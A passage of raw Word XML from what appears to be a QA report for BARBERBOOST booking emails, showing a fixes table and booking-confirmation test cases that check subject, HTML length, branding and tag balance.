                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> template missing entirely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4EF1923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Added</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="2FCE38FB" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6093C9C6"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auth/callback</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> sent welcome email only, no signup alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20B08AE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Fixed: now sends both</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="18AC8B45" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="156CC65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Env validation throws in production on partial config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="090179D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Fixed: logs warning, does not crash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E679F33" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7766D763">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="585325CB" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc228978585"/>
      <w:bookmarkStart w:id="16" w:name="test-cases"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Test Cases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="08DDB46A" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="legend"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Legend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F0DEA" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — unique test case identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5A7D2" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>structural</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (render output), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (copy/data), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>edge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (boundary input), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>live</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (actual Resend send)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F23E6A6" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FAIL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F545374" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3F61E16F">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61129195" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="tc-bcf-booking-confirmation"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-BCF — Booking Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2067F87E"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Triggered when a client completes a booking via the dashboard (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/bookings</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) or public booking page (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/public/bookings</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="08A8A753"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="4FB4BAD0"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="636F8A83"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="4921B255"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="2CC3528D"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5C42C5BC"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41C75C07" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4927CF7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BCF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="174E66B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35C83315"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5C5C7EF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6380083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5ABA5E4" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="182247A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BCF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76243DC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67626F74"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="465A9AA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4914 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1CEC70A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50E54AC" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1507FE2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BCF-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6EAD442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081D6CC9"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field is &gt; 20 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6BE3070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507 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7F907CB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817AA23" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71D3279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BCF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CA3D02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43748C6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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> declaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="693A51E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7D64337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DEE9F41" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0EE6B9E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BCF-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="447603A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7E76A40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BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="287FD7F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4B8D11B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3696CEA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46607CC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BCF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E9F6AA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44CB87B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uses brand gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>#c9a84c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F23869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0F0729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1456A37" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3E84273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BCF-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6EE183D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5C8C53B4"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags are balanced (open = close)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0E74170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4 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="16A3497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B8571D3" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F08849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BCF-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="74D4638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12FC4DB4"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags are balanced (open = close)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
